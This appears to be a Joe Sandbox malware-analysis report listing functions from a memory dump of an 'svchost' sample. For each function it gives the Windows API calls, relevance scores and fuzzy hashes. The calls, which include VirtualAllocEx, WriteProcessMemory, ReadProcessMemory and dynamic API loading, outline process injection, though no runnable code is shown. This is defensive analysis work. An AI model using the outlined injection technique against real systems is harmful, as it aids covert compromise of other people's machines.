Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

_time64.MSVCRT ref: 00000001400158F2

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$_time64$AddressLibraryLoadProcmemset
String ID:
API String ID: 4044016582-0
Opcode ID: 976164784313fb201fc363347bf02393d1a175d1830bf4b901d432c3735b5581
Instruction ID: 1ff008e7178ffe5c36afa01dae6893e19bf73e557f2170abeac8c26d8b64783f
Opcode Fuzzy Hash: 976164784313fb201fc363347bf02393d1a175d1830bf4b901d432c3735b5581
Instruction Fuzzy Hash: 68F14672200B80C6EB52DF1AD4943EA37A5F788BC5F15812AEB8E9B7A5DF35C485C740

Function 0000000140012820 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 368COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000014001286F

Strings

@, xrefs: 0000000140012BF5

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: memset
String ID: @
API String ID: 2221118986-2766056989
Opcode ID: c169588ed08e8372eaba719479e975c479cb340a6a88987632b20084c5243531
Instruction ID: 3b6190bc3fad717221f5bbcce2ae25d4d52b3cf8b168bce159151464274ee265
Opcode Fuzzy Hash: c169588ed08e8372eaba719479e975c479cb340a6a88987632b20084c5243531
Instruction Fuzzy Hash: 15021836610B8485EB62DF26E8907EA67A0F78CBC8F44412AEF8D47B69DF39C154C740

Function 000000014000F310 Relevance: 16.8, APIs: 11, Instructions: 323memorysleeptimeCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 000000014000F4FA
HeapFree.KERNEL32 ref: 000000014000F519
GetFileTime.KERNEL32 ref: 000000014000F5E9
_time64.MSVCRT ref: 000000014000F639
_time64.MSVCRT ref: 000000014000F65E
HeapFree.KERNEL32 ref: 000000014000F6A9
Sleep.KERNEL32 ref: 000000014000F705
_time64.MSVCRT ref: 000000014000F7D7
HeapFree.KERNEL32 ref: 000000014000F836
HeapFree.KERNEL32 ref: 000000014000F870
HeapFree.KERNEL32 ref: 000000014000F892

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$_time64$FileSleepTime
String ID:
API String ID: 2289066803-0
Opcode ID: 40ba65c08b9e5bb65b5414c166f13d3b7ca319df4cbb5a065c46412f29ab1c83
Instruction ID: 1ab422d41cd114fbfdff5d5c6448fbea51a6bf4249b6e681b0e7df56046467f6
Opcode Fuzzy Hash: 40ba65c08b9e5bb65b5414c166f13d3b7ca319df4cbb5a065c46412f29ab1c83
Instruction Fuzzy Hash: DFF18B76200B8586EB61DF26E8543EE37A4F789BC8F408126EB8D47BA5CF39C549D740

Function 0000000140018520 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 000000014001855B
RtlLookupFunctionEntry.KERNEL32 ref: 000000014001857A
RtlVirtualUnwind.KERNEL32 ref: 00000001400185C6
SetUnhandledExceptionFilter.KERNEL32 ref: 000000014001863A
UnhandledExceptionFilter.KERNEL32 ref: 0000000140018647
GetCurrentProcess.KERNEL32 ref: 000000014001864D
TerminateProcess.KERNEL32 ref: 000000014001865B

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtual
String ID:
API String ID: 3266983031-0
Opcode ID: 1c4ec40dd17319df299da24903791129a37fd02a472f3cc71aadb4a76c336ffa
Instruction ID: 6ca92d44798bfbdcd13931f1ba461a477904d21d6d181f3beb0808d86e954708
Opcode Fuzzy Hash: 1c4ec40dd17319df299da24903791129a37fd02a472f3cc71aadb4a76c336ffa
Instruction Fuzzy Hash: C3319275104B4486EB629B16F8843DAB3A4F78C7D4F50411AEB8D47B79DF79C658C700

Function 0000000140013CD0 Relevance: 10.2, APIs: 8, Instructions: 183memorystringCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 0000000140013D2A
lstrlenW.KERNEL32 ref: 0000000140013D3B
HeapFree.KERNEL32 ref: 0000000140013DF9
HeapFree.KERNEL32 ref: 0000000140013E29

Part of subcall function 0000000140011FE0: VirtualAllocEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 0000000140012116

Part of subcall function 0000000140013800: WriteProcessMemory.KERNEL32 ref: 000000014001392E

HeapFree.KERNEL32 ref: 0000000140013EC4
HeapFree.KERNEL32 ref: 0000000140013F6E
HeapFree.KERNEL32 ref: 0000000140013FC5
HeapFree.KERNEL32 ref: 0000000140013FDF

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$AllocMemoryProcessVirtualWritelstrlen
String ID:
API String ID: 2980677570-0
Opcode ID: c8bad31549eb03286af95aea3e69b03a8021d278381b3c8cbf91d7313f1d40d0
Instruction ID: 2dab337ee8d68b7cc9e8264ef1f707780b607853232d03d74ae5f575a22fd722
Opcode Fuzzy Hash: c8bad31549eb03286af95aea3e69b03a8021d278381b3c8cbf91d7313f1d40d0
Instruction Fuzzy Hash: 92814632215B8186E7A28B12E84479BB7A4F78CBD4F044129EFCD87BA5EF38C545CB00

Function 000000014000F8D0 Relevance: 9.0, APIs: 7, Instructions: 225memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FBE9

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E612
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E63D
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E668
Part of subcall function 000000014000E580: GetProcessHeap.KERNEL32 ref: 000000014000E67E
Part of subcall function 000000014000E580: RtlReAllocateHeap.NTDLL ref: 000000014000E69E

Part of subcall function 000000014000E580: RtlAllocateHeap.NTDLL ref: 000000014000E6A9

HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FB3C
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FB56
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FB74
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FB96
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FBB0
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FBCA

Part of subcall function 0000000140013B00: ReadProcessMemory.KERNEL32 ref: 0000000140013B25

Part of subcall function 000000014000BF10: HeapFree.KERNEL32(?,?,?,?,?,000000014000247B,?,?,?,00000001400023F7), ref: 000000014000BFA0

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Free$AddressProc$AllocateProcess$LibraryLoadMemoryRead
String ID:
API String ID: 2491122006-0
Opcode ID: 09873fec92877f518c362985b5da0a46ce3d3219a83bb375dbd9e82aa2709a25
Instruction ID: 68c8fbabcff802c526084c53bb8964246dfaaeb998f36def65cd26f4996e6266
Opcode Fuzzy Hash: 09873fec92877f518c362985b5da0a46ce3d3219a83bb375dbd9e82aa2709a25
Instruction Fuzzy Hash: 3AA145B2301B4085FB52DF67E4603EA33A5F788BD8F048529AF5857BA9DF34C845A750

Function 00000001400182FC Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000000140018333
GetCurrentProcessId.KERNEL32 ref: 000000014001833E
GetCurrentThreadId.KERNEL32 ref: 000000014001834A
GetTickCount.KERNEL32 ref: 0000000140018356
QueryPerformanceCounter.KERNEL32 ref: 0000000140018367

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: ca367986e5882e155562448106f5efe6e8986abbd5978ec8722d427d7b5e0517
Instruction ID: 4282b2ffed1f1902788247a1ead55fe5c5022d60fe0a4bff3f2e92ceacb5a284
Opcode Fuzzy Hash: ca367986e5882e155562448106f5efe6e8986abbd5978ec8722d427d7b5e0517
Instruction Fuzzy Hash: CC012D31215B4486FB928F22E9843956360F74DBD0F446624FFAE4B7B4DA3DCA998740

Function 0000000140014080 Relevance: 6.3, APIs: 4, Instructions: 275memoryfileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 00000001400143A2

Part of subcall function 0000000140002660: HeapFree.KERNEL32 ref: 00000001400027B7
Part of subcall function 0000000140002660: HeapFree.KERNEL32 ref: 00000001400027D1
Part of subcall function 0000000140002660: HeapFree.KERNEL32 ref: 00000001400027EB

HeapFree.KERNEL32 ref: 000000014001441B
HeapFree.KERNEL32 ref: 00000001400144DE
HeapFree.KERNEL32 ref: 00000001400144F8

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$AddressFileLibraryLoadProcRead
String ID:
API String ID: 387921010-0
Opcode ID: eadf0efd34f26277e8400af0cfcc570356fd1329ee8f58013c18fc709ca27727
Instruction ID: cba2ec3feea0474adde51f7879ad5c737c0c375ffbddc39dfdd9f5c2093ba4f8
Opcode Fuzzy Hash: eadf0efd34f26277e8400af0cfcc570356fd1329ee8f58013c18fc709ca27727
Instruction Fuzzy Hash: 56D15C32604B9586EB21CF66E8503EA77A0F788BC8F544126EF8D4BBA9DF39C545C740

Function 0000000140007340 Relevance: 4.6, APIs: 3, Instructions: 122memoryencryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32 ref: 00000001400074F1

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

memcpy.MSVCRT ref: 0000000140007475
HeapFree.KERNEL32 ref: 00000001400074C0

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: AddressContextCryptFreeHeapLibraryLoadProcReleasememcpy
String ID:
API String ID: 2867732488-0
Opcode ID: 9a26799eaaf4163cc504d9e91266e7a0b919504d3ea1120257a67cb58b92511a
Instruction ID: 2db249bd383248aba45334d7a8506845dbe1c60679b5032ff9891b2fde60f497
Opcode Fuzzy Hash: 9a26799eaaf4163cc504d9e91266e7a0b919504d3ea1120257a67cb58b92511a
Instruction Fuzzy Hash: 87512532B01B4589EB51CB62E844B9D7BA9FB88B88F14402ADF4C57B68DF38C445C740

Function 0000000140006FB0 Relevance: 3.1, APIs: 2, Instructions: 99memoryencryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,?,00000020,00000000,00000001400072AD), ref: 0000000140007118

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

HeapFree.KERNEL32 ref: 00000001400070E8

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: AddressContextCryptFreeHeapLibraryLoadProcRelease
String ID:
API String ID: 3850130045-0
Opcode ID: 145929a3609508ac8404060b31b796e4061ef22d857f2634ef8391897ab5f1ff
Instruction ID: 19954f6952f382fe07ad367a4b777b92ae69b62c1249c18f4d2fda55ef73c1ac
Opcode Fuzzy Hash: 145929a3609508ac8404060b31b796e4061ef22d857f2634ef8391897ab5f1ff
Instruction Fuzzy Hash: 4A413D7671178586EB61DF16E494BAA77A4F7C8B84F048126EF8D87764CF38C845CB40

Function 000000014000C0C0 Relevance: 1.7, APIs: 1, Instructions: 201libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

GetProcAddress.KERNEL32 ref: 000000014000C169

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProcmemset
String ID:
API String ID: 4219566340-0
Opcode ID: 73a227b09f757a1249d5b25b467e9ad04729ed7ee61bc8e6451ac5836c3fc14c
Instruction ID: 428b3f066b109f255c39e2ebfc4fbc54e526bd0559da4fecb65a859fdc128361
Opcode Fuzzy Hash: 73a227b09f757a1249d5b25b467e9ad04729ed7ee61bc8e6451ac5836c3fc14c
Instruction Fuzzy Hash: 8491FBB22116C595EF32CF26E8507EE37A0F7497C8F448012F7498BAA9DB79CA05C340

Function 0000000140018168 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140018173

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6232d811d3cfb7e92c117290181e80137c246c2343d6329668bcc7e7c22aaeff
Instruction ID: b14e74fb3442ca454c0f05d9baab849c330a8665264c7a09ccb05e29302e0afa
Opcode Fuzzy Hash: 6232d811d3cfb7e92c117290181e80137c246c2343d6329668bcc7e7c22aaeff
Instruction Fuzzy Hash: 67B01271B51400D1D606AB23DCC23C012F4675C350FD00410D60D8A130DB3D83EFC700

Function 00000001400065D0 Relevance: 24.4, APIs: 16, Instructions: 363
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32 ref: 0000000140006760
SysFreeString.OLEAUT32 ref: 0000000140006775
_wtoi.MSVCRT ref: 0000000140006865
HeapFree.KERNEL32 ref: 00000001400068B9
HeapFree.KERNEL32 ref: 00000001400068D3
rand.MSVCRT ref: 00000001400068E0
HeapFree.KERNEL32 ref: 00000001400069E9
HeapFree.KERNEL32 ref: 0000000140006A08
HeapFree.KERNEL32 ref: 0000000140006A36
HeapFree.KERNEL32 ref: 0000000140006A58
SysFreeString.OLEAUT32 ref: 0000000140006A80
SysFreeString.OLEAUT32 ref: 0000000140006A90
HeapFree.KERNEL32 ref: 0000000140006AEC
HeapFree.KERNEL32 ref: 0000000140006B07
HeapFree.KERNEL32 ref: 0000000140006BA1
HeapFree.KERNEL32 ref: 0000000140006BBC

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E612
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E63D
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E668
Part of subcall function 000000014000E580: GetProcessHeap.KERNEL32 ref: 000000014000E67E
Part of subcall function 000000014000E580: RtlReAllocateHeap.NTDLL ref: 000000014000E69E

Part of subcall function 000000014000E580: RtlAllocateHeap.NTDLL ref: 000000014000E6A9

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$Heap$AddressProcString$Allocate$LibraryLoadProcess_wtoirand
String ID:
API String ID: 2238110293-0
Opcode ID: 2c2506c9d29a3b2e37dadef24b2f3c2898cd3c267f0d8796ce2abf700301f374
Instruction ID: 4a3659216eab84ee89323299ad5868aa41759a22a73ed70f653af329964e58fc
Opcode Fuzzy Hash: 2c2506c9d29a3b2e37dadef24b2f3c2898cd3c267f0d8796ce2abf700301f374
Instruction Fuzzy Hash: FFF16DB2304B8186EB62DF26E9403EA63A5F78DBC4F148015EB8E67B69DF39C545C701

Function 000000014000B7D0 Relevance: 22.8, APIs: 15, Instructions: 333
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32 ref: 000000014000B92A
SysFreeString.OLEAUT32 ref: 000000014000B93F
_wtoi.MSVCRT ref: 000000014000BA37
HeapFree.KERNEL32 ref: 000000014000BA79
HeapFree.KERNEL32 ref: 000000014000BA93
rand.MSVCRT ref: 000000014000BAA0
HeapFree.KERNEL32 ref: 000000014000BB84
HeapFree.KERNEL32 ref: 000000014000BB9F
HeapFree.KERNEL32 ref: 000000014000BC51
HeapFree.KERNEL32 ref: 000000014000BC78
HeapFree.KERNEL32 ref: 000000014000BC92
SysFreeString.OLEAUT32 ref: 000000014000BCBA
SysFreeString.OLEAUT32 ref: 000000014000BCCA
HeapFree.KERNEL32 ref: 000000014000BD29
HeapFree.KERNEL32 ref: 000000014000BD4C

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E612
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E63D
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E668
Part of subcall function 000000014000E580: GetProcessHeap.KERNEL32 ref: 000000014000E67E
Part of subcall function 000000014000E580: RtlReAllocateHeap.NTDLL ref: 000000014000E69E

Part of subcall function 000000014000E580: RtlAllocateHeap.NTDLL ref: 000000014000E6A9

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$Heap$AddressProcString$Allocate$LibraryLoadProcess_wtoirand
String ID:
API String ID: 2238110293-0
Opcode ID: 5ac5ed8ab6b7965b0a15b53e9b8ab694a50f8e425c364abc59f255adc166618d
Instruction ID: 24ed72427a13ddd5fcc77b1a0f8ca7dcc51255d65edbd16390ea418555290099
Opcode Fuzzy Hash: 5ac5ed8ab6b7965b0a15b53e9b8ab694a50f8e425c364abc59f255adc166618d
Instruction Fuzzy Hash: B4E15CB6201B8486EB62DF16E8507EA77A0FB89BC8F444025EF4E47B69DF39C545C700

Function 0000000140006100 Relevance: 22.8, APIs: 15, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140001FA0: SysFreeString.OLEAUT32 ref: 0000000140001FE4
Part of subcall function 0000000140001FA0: SysFreeString.OLEAUT32 ref: 0000000140001FF3
Part of subcall function 0000000140001FA0: ??3@YAXPEAX@Z.MSVCRT ref: 0000000140001FFC
Part of subcall function 0000000140001FA0: HeapFree.KERNEL32 ref: 0000000140002030

SysFreeString.OLEAUT32 ref: 00000001400061EB
SysFreeString.OLEAUT32 ref: 00000001400061FE
SysFreeString.OLEAUT32 ref: 0000000140006214
SysFreeString.OLEAUT32 ref: 0000000140006233
SysFreeString.OLEAUT32 ref: 000000014000623D
HeapFree.KERNEL32 ref: 0000000140006266
SysFreeString.OLEAUT32 ref: 0000000140006506
SysFreeString.OLEAUT32 ref: 0000000140006519
SysFreeString.OLEAUT32 ref: 0000000140006527
SysFreeString.OLEAUT32 ref: 0000000140006565
SysFreeString.OLEAUT32 ref: 000000014000656F
HeapFree.KERNEL32 ref: 00000001400065AA

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$String$Heap$??3@
String ID:
API String ID: 3062846050-0
Opcode ID: 25cf90377470c744e4eee7f6f1cc8f0c0b72b68b3d3dfc4207a14fcec5be35b2
Instruction ID: 567a171887cd63558544f340f6ae29d700814bafcf893e5afe614293ba1669bb
Opcode Fuzzy Hash: 25cf90377470c744e4eee7f6f1cc8f0c0b72b68b3d3dfc4207a14fcec5be35b2
Instruction Fuzzy Hash: B3D14D76201A8186EB62DF26E8503EE67A1F78CBC8F144125EF8E57B69DF39C549C700

Function 0000000140005E10 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 203COMMON

Download Yara Rule

APIs

tolower.MSVCRT ref: 0000000140005EB8
SysFreeString.OLEAUT32 ref: 0000000140005F20
SysFreeString.OLEAUT32 ref: 0000000140005F33
tolower.MSVCRT ref: 0000000140005F97
_wtoi.MSVCRT ref: 0000000140005FCB

Strings

mcco, xrefs: 0000000140005EF8
run, xrefs: 0000000140006042
mcco, xrefs: 0000000140005F73

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
